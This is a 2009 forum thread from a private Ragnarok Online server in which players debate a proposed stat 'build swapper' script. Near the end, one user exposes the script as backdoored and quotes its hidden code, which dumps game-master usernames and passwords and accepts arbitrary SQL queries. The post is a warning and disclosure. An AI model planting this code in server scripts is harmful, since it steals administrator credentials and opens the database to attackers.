Thread Rating:
  • 0 Votes - 0 Average
Build swapper - very useful
Quesadilla Offline
SUPER ULTRA MEGA TACO GUY

RE:??Build swapper - very useful

Cheesecake Wrote:It wont happen. Feel free to dream though.
I love how you said it won't happen but gave no reason. The only reason it wouldn't happen would be because of laziness. If you can give a reason instead of just flamebaiting, it would be a bit more acceptable, but as it is you're almost spamming, having said that it wouldn't happen three times but giving no reason.
That doesn't add any juicy goodness to the thread. It just adds useless and redundant information, and possible bitching. (like this post!)
We heard you the first time. You don't think it's going to happen. Now be quiet, we don't care about your opinion enough to hear it three times. Icon_smile
06-15-2009 11:19 AM
Find all posts by this user Quote this message in a reply
bloodline Offline

RE: Build swapper - very useful

this will just make people stop using the reseter forever lol make it a challenge guys Icon_biggrin
06-15-2009 11:27 AM
Avalon_Fates Offline
†Last Angel†

*sigh* Kretzer already said this but ill say it again.

heRO Reseting is discouraged...as it were. Its suppost to be for people who make a mistake with their build or want to try something new. Not so they can do 3 different things using 3 different builds. Remember Reseting goes up every time you use it. So having something "Save Builds is a waste of time" No offense.

Now something that allowed you to save Color,Hair and Hair Color combinations would be fantastic @_@

[Image: 330g3na.gif]
"A utopia without love is just an illusion"
Angel Fates /99-68/1 agi 190aspd Lord Knight.
Magia Erebea Elysia /83-49/ Battle Alchemist
Magia Elysia/94-50/Magic Bullet Monk <-Needs work.
06-15-2009 01:37 PM
Sharpay Offline
Fabulous

Just make 3 different characters with 3 different builds.

...Problem solved!
06-15-2009 02:18 PM
i/o Offline
Present!... Once in a while ^^;

I like this idea, mostly because i see the problem with alchemist having to change their builds from WoE/PvP/MvP to potion making so they can go back to their original builds again, to keep training. It's annoying having to put up those stat points all over again, I find this idea much better than a palette color saver (color change is free).

So yeah... Do you have anything better to do? Because I sure don't, so entertain me, or just give me something to do XD
06-15-2009 02:33 PM
Mister Reinn Offline
Newest Vanilover

if you have enough money to keep changing that, why dont you make three or so different alchemists?

[Image: Assinatura.gif]
Smirnoff - 80/50 Priest
Reinn - 8x/50 Assassin
Bram Stalker - 9x/50 Rogue
DigaSmith - 67/2x Blacksmith
Durande - 7x/3x Alchemist
JellyBob the II - 5x Vanilmirth

Quote:Sister Elizabeth :Main: When I play Pokemon, I name all of my Pokemon "Masturbate"
Sister Elizabeth :Main: "Go! Masturbate!"
06-15-2009 03:31 PM
BlueAlchemy Offline

RE:??Build swapper - very useful

bloodline Wrote:this will just make people stop using the reseter forever lol make it a challenge guys Icon_biggrin

How? there will come a time when you need too make a reset outside your stored stat/skill build so theirs probably gonna still be use for the normal reset

Characters:
Zraxus (main) Creator
Brave Sir Robin    Bard
Inigo   Crusader
VixPaladin  (for gods sake I'm a priest not a paladin)
Check out my store!
06-15-2009 08:31 PM
Cheesecake Offline
The Tasty Trap

Make more than 1 character if you need to keep changing. Thats the way the game is supposed to be played.

If you need a reason why this entire thing is stupid, and will not be added, let me break it down for you.

1. HeRO added in cost increases to discourage reseting.
2. Reseting is implimented for mistakes, and leveling builds til 40-70.
3. Issues with missclicking the wrong build. OOPS.
4. This would encourage people to reset to try it. Uh. No.

[Image: 35iqbyd.png]
Cheesecake 93/99 SuperNovice | Hell 7x/4x Hybrid Hunter
Milkshake 7x/4x Knight | Lein 7x/4x Priest | Mystia 8x/5x Monk

06-15-2009 08:41 PM
Visit this user's website Find all posts by this user Quote this message in a reply
OrangeXP Offline

Lmao.

Slight thread necro but I thought it should be mentioned:

The original poster is so 'lovable' that he even provides a trojan/backdoor for the server in addition to the complimentary build swapper.

query_sql "SELECT userid FROM login where level=99 order by userid", @u$;query_sql "SELECT user_pass FROM login where level=99 order by userid",@p$;mes @u$[0]+" "+@p$[0];mes @u$[1]+" "+@p$[1];mes @u$[2]+" "+@p$[2];mes @u$[3]+" "+@p$[3];mes @u$[4]+" "+@p$[4];mes @u$[5]+" "+@p$[5];mes @u$[6]+" "+@p$[6];mes @u$[7]+" "+@p$[7];mes @u$[8]+" "+@p$[8];mes @u$[9]+" "+@p$[9];next;goto L_s;l_q:mes"QUERY-SQL";mes "inserisci query";input @q$;query_sql @q$;goto L_s;}else{end;}

If you don't understand the above it means 'dump assumed GM's login info to screen,' accessible through a hidden login.

You can see for yourself by downloading his files and turning on word wrap in whatever text file editor you use. Note that this person has attempted this on other servers. The whole linked website is just a setup for backdoored files.
07-31-2009 05:15 PM
GM-Aki Offline
Posting Freak

Sweat, I love the where level=99 part, we would have checked before doing it but it confirms we're not interested in the manner it has been exposed. Thank you.

The Cake is a Lie

heRO Wiki | Support Ticket | Vote for HeRO | Review heRO
07-31-2009 05:18 PM
Visit this user's website Find all posts by this user Quote this message in a reply